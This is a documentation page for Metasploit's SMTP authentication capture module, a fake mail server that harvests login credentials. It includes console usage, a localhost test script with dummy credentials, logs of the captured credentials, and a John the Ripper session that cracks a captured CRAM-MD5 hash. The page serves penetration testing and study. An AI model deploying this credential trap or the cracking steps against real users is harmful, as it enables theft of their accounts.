Authentication Capture: SMTP - Metasploit
This page contains detailed information about how to use the auxiliary/server/capture/smtp metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Authentication Capture: SMTP
Module: auxiliary/server/capture/smtp
Source code: modules/auxiliary/server/capture/smtp.rb
Disclosure date: -
Last modification time: 2020-07-11 17:30:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module provides a fake SMTP service that is designed to capture authentication credentials.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/capture/smtp
msf auxiliary(smtp) > show targets
... a list of targets ...
msf auxiliary(smtp) > set TARGET target-id
msf auxiliary(smtp) > show options
... show and set options ...
msf auxiliary(smtp) > exploit
Knowledge Base
Vulnerable Application
This module creates a mock SMTP server which accepts credentials or unauthenticated email
before throwing a 503
error.
Verification Steps
- Start msfconsole
- Do:
use auxiliary/server/capture/smtp
- Do:
run
Scenarios
Testing Script
The following script should test the following:
- Auth Plain
- Auth Login
- Auth CRAM-MD5
- Sending an email w/o auth
RSET is implemented (https://github.com/rapid7/metasploit-framework/issues/11980)
require 'net/smtp' require 'socket' puts 'Testing: plain' begin Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_plain', 'password_plain', :plain) rescue => e puts "Error: #{e}" end puts 'Testing: login' begin Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_login', 'password_login', :login) rescue => e puts "Error: #{e}" end puts 'Testing: cram md5' begin Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_cram', 'password_cram', :cram_md5) rescue => e puts "Error: #{e}" end puts 'Testing: DATA' begin Net::SMTP.start('127.0.0.1') do |smtp| smtp.send_message 'test', '[email protected]', '[email protected]' end rescue => e puts "Error: #{e}" end # test for https://github.com/rapid7/metasploit-framework/issues/11980 puts 'Testing: RSET during DATA' begin t = TCPSocket.open('127.0.0.1', 25) t.gets t.print("EHLO localhost \r\n") t.gets t.print("MAIL FROM:
\r\n") t.gets t.print("MAIL TO: \r\n") t.gets t.print("DATA\r\n") t.gets t.print("RSET\r\n") puts " Response: #{t.gets.chop}" rescue => e puts "Error: #{e}" end puts 'Testing: RSET during middle of DATA' begin t = TCPSocket.open('127.0.0.1', 25) t.gets t.print("EHLO localhost \r\n") t.gets t.print("MAIL FROM: \r\n") t.gets t.print("MAIL TO: \r\n") t.gets t.print("DATA\r\n") t.gets t.print("testing a message which gets cancelled\r\n") t.print("RSET\r\n") puts " Response: #{t.gets.chop}" rescue => e puts "Error: #{e}" end
Output from testing script
When this script is run from the Metasploit console, it intermingles with the commands, which is great!
$ sudo ./msfconsole -qx 'use auxiliary/server/capture/smtp; set srvhost 127.0.0.1;run;ruby tools/dev/test_capture_smtp.rb'
srvhost => 127.0.0.1
[*] Auxiliary module running as background job 0.
[*] exec: ruby tools/dev/test_capture_smtp.rb
[*] Started service listener on 127.0.0.1:25
[*] Server started.
Testing: plain
[*] SMTP: 127.0.0.1:46212 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46212 Command: AUTH PLAIN AHVzZXJuYW1lX3BsYWluAHBhc3N3b3JkX3BsYWlu
[+] SMTP LOGIN 127.0.0.1:46212 username_plain / password_plain
Testing: login
[*] SMTP: 127.0.0.1:46214 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46214 Command: AUTH LOGIN
[*] SMTP: 127.0.0.1:46214 Command: dXNlcm5hbWVfbG9naW4=
[*] SMTP: 127.0.0.1:46214 Command: cGFzc3dvcmRfbG9naW4=
[+] SMTP LOGIN 127.0.0.1:46214 username_login / password_login
Testing: cram md5
[*] SMTP: 127.0.0.1:46216 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46216 Command: AUTH CRAM-MD5
[*] SMTP: 127.0.0.1:46216 Command: dXNlcm5hbWVfY3JhbSA3YjA2NzUyMjVhM2FjMmI5MjMxYzJlOTM5OTg2Y2U0Mg==
Testing: DATA
[+] SMTP LOGIN 127.0.0.1:46216 username_cram / <[email protected]>#7b0675225a3ac2b9231c2e939986ce42
[*] SMTP: 127.0.0.1:46218 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46218 Command: MAIL FROM:
[*] SMTP: 127.0.0.1:46218 Command: RCPT TO:
[*] SMTP: 127.0.0.1:46218 Command: DATA
[*] SMTP: 127.0.0.1:46218 Command: test
.
[*] SMTP: 127.0.0.1:46218 EMAIL: test
[*] SMTP: 127.0.0.1:46218 Command: QUIT
Testing: RSET during DATA
[*] SMTP: 127.0.0.1:46220 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46220 Command: MAIL FROM:
[*] SMTP: 127.0.0.1:46220 Command: MAIL TO:
[*] SMTP: 127.0.0.1:46220 Command: DATA
[*] SMTP: 127.0.0.1:46220 Command: RSET
Response: 250 OK
Testing: RSET during middle of DATA
[*] SMTP: 127.0.0.1:46222 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46222 Command: MAIL FROM:
[*] SMTP: 127.0.0.1:46222 Command: MAIL TO:
[*] SMTP: 127.0.0.1:46222 Command: DATA
[*] SMTP: 127.0.0.1:46222 Command: testing a message which gets cancelled
RSET
[*] SMTP: 127.0.0.1:46222 EMAIL: testing a message which gets cancelled
Response: 250 OK
msf5 auxiliary(server/capture/smtp) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
127.0.0.1 127.0.0.1 25/tcp (smtp) username_cram <[email protected]>#7b0675225a3ac2b9231c2e939986ce42 Nonreplayable hash hmac-md5
127.0.0.1 127.0.0.1 25/tcp (smtp) username_login password_login Password
127.0.0.1 127.0.0.1 25/tcp (smtp) username_plain password_plain Password
msf5 auxiliary(server/capture/smtp) > notes
Notes
=====
Time Host Service Port Protocol Type Data
---- ---- ------- ---- -------- ---- ----
2020-04-17 15:11:24 UTC 127.0.0.1 smtp_message "testing a message which gets cancelled\r\n"
Cracking Cram-md5 (hmac-md5)
Metasploit currently doesn't have a cracker for hmac-md5
, however the output is pre-formatted to JTR standards,
and creds -o /tmp/file.jtr
will export it correctly for John. It is also possible to export to hashcat format
with creds -o /tmp/file.hcat
and mode 10200
.
user@kali:~/metasploit-framework$ sudo cat /tmp/cram
username_cram:<[email protected]>#7b0675225a3ac2b9231c2e939986ce42
user@kali:~/metasploit-framework$ sudo cat /tmp/wordlist
password_cram
user@kali:~/metasploit-framework$ sudo john --wordlist=/tmp/wordlist --format=hmac-md5 /tmp/cram
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-MD5 [password is key, MD5 256/256 AVX2 8x3])
Warning: poor OpenMP scalability for this hash type, consider --fork=8
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 192 needed for performance.
password_cram (username_cram)
1g 0:00:00:00 DONE (2020-04-17 11:32) 50.00g/s 50.00p/s 50.00c/s 50.00C/s password_cram
Use the "--show --format=HMAC-MD5" options to display all of the cracked passwords reliably
Session completed
Go back to menu.
Msfconsole Usage
Here is how the server/capture/smtp auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/capture/smtp
msf6 auxiliary(server/capture/smtp) > show info
Name: Authentication Capture: SMTP
Module: auxiliary/server/capture/smtp
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
ddz <[email protected]>
hdm <[email protected]>
h00die
Available actions:
Name Description
---- -----------
Capture Run SMTP capture server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 25 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Description:
This module provides a fake SMTP service that is designed to capture
authentication credentials.
References:
https://www.samlogic.net/articles/smtp-commands-reference-auth.htm
tools.ietf.org/html/rfc5321
http://fehcom.de/qmail/smtpauth.html
Module Options
This is a complete list of options available in the server/capture/smtp auxiliary module:
msf6 auxiliary(server/capture/smtp) > show options
Module options (auxiliary/server/capture/smtp):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 25 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Auxiliary action:
Name Description
---- -----------
Capture Run SMTP capture server
Advanced Options
Here is a complete list of advanced options supported by the server/capture/smtp auxiliary module:
msf6 auxiliary(server/capture/smtp) > show advanced
Module advanced options (auxiliary/server/capture/smtp):
Name Current Setting Required Description
---- --------------- -------- -----------
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/capture/smtp module can do:
msf6 auxiliary(server/capture/smtp) > show actions
Auxiliary actions:
Name Description
---- -----------
Capture Run SMTP capture server
Evasion Options
Here is the full list of possible evasion options supported by the server/capture/smtp auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(server/capture/smtp) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Unknown authentication type string: <ARG>
Here is a relevant code snippet related to the "Unknown authentication type string: <ARG>" error message:
241: @state[client][:auth_cram] = true
242: @state[client][:auth_cram_challenge] = challenge
243: return
244: end
245: # some other auth we dont understand
246: vprint_error("Unknown authentication type string: #{arg}")
247: client.put "503 Server Error\r\n"
248: else
249: vprint_error("Unknown command: #{arg}")
250: end
251: client.put "503 Server Error\r\n"
503 Server Errorrn
Here is a relevant code snippet related to the "503 Server Errorrn" error message:
242: @state[client][:auth_cram_challenge] = challenge
243: return
244: end
245: # some other auth we dont understand
246: vprint_error("Unknown authentication type string: #{arg}")
247: client.put "503 Server Error\r\n"
248: else
249: vprint_error("Unknown command: #{arg}")
250: end
251: client.put "503 Server Error\r\n"
252:
Unknown command: <ARG>
Here is a relevant code snippet related to the "Unknown command: <ARG>" error message:
244: end
245: # some other auth we dont understand
246: vprint_error("Unknown authentication type string: #{arg}")
247: client.put "503 Server Error\r\n"
248: else
249: vprint_error("Unknown command: #{arg}")
250: end
251: client.put "503 Server Error\r\n"
252:
253: end
254:
503 Server Errorrn
Here is a relevant code snippet related to the "503 Server Errorrn" error message:
246: vprint_error("Unknown authentication type string: #{arg}")
247: client.put "503 Server Error\r\n"
248: else
249: vprint_error("Unknown command: #{arg}")
250: end
251: client.put "503 Server Error\r\n"
252:
253: end
254:
255: def report_cred(opts)
256: service_data = {
Go back to menu.
Related Pull Requests
- #13271 Merged Pull Request: aux/server/capture/smtp now captures auth!
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #9897 Merged Pull Request: Fix #8404 ListenerComm Support For Exploit::Remote::TcpServer
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5768 Merged Pull Request: Update modules to use metasploit-credential instead of report_auth_info
- #2525 Merged Pull Request: Change module boilerplate
- #1228 Merged Pull Request: MSFTIDY cleanup #1 - auxiliary
References
- CVE: Not available
- https://www.samlogic.net/articles/smtp-commands-reference-auth.htm
- tools.ietf.org/html/rfc5321
- http://fehcom.de/qmail/smtpauth.html
See Also
Check also the following modules related to this module:
- auxiliary/client/smtp/emailer
- auxiliary/dos/smtp/sendmail_prescan
- auxiliary/dos/windows/smtp/ms06_019_exchange
- auxiliary/fuzzers/smtp/smtp_fuzzer
- auxiliary/scanner/http/smt_ipmi_49152_exposure
- auxiliary/scanner/http/smt_ipmi_cgi_scanner
- auxiliary/scanner/http/smt_ipmi_static_cert_scanner
- auxiliary/scanner/http/wp_easy_wp_smtp
- auxiliary/scanner/smtp/smtp_enum
- auxiliary/scanner/smtp/smtp_ntlm_domain
- auxiliary/scanner/smtp/smtp_relay
- auxiliary/scanner/smtp/smtp_version
- exploit/linux/http/smt_ipmi_close_window_bof
- exploit/linux/smtp/apache_james_exec
- exploit/linux/smtp/exim4_dovecot_exec
- exploit/linux/smtp/exim_gethostbyname_bof
- exploit/linux/smtp/haraka
- exploit/unix/local/opensmtpd_oob_read_lpe
- exploit/unix/smtp/clamav_milter_blackhole
- exploit/unix/smtp/exim4_string_format
- exploit/unix/smtp/morris_sendmail_debug
- exploit/unix/smtp/opensmtpd_mail_from_rce
- exploit/unix/smtp/qmail_bash_env_exec
- exploit/windows/smtp/mailcarrier_smtp_ehlo
- exploit/windows/smtp/mercury_cram_md5
- exploit/windows/smtp/ms03_046_exchange2000_xexch50
- exploit/windows/smtp/njstar_smtp_bof
- exploit/windows/smtp/sysgauge_client_bof
- exploit/windows/smtp/wmailserver
- exploit/windows/smtp/ypops_overflow1
- auxiliary/scanner/ipmi/ipmi_cipher_zero
- auxiliary/scanner/ipmi/ipmi_dumphashes
- auxiliary/scanner/ipmi/ipmi_version
Authors
- ddz
- hdm
- h00die
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.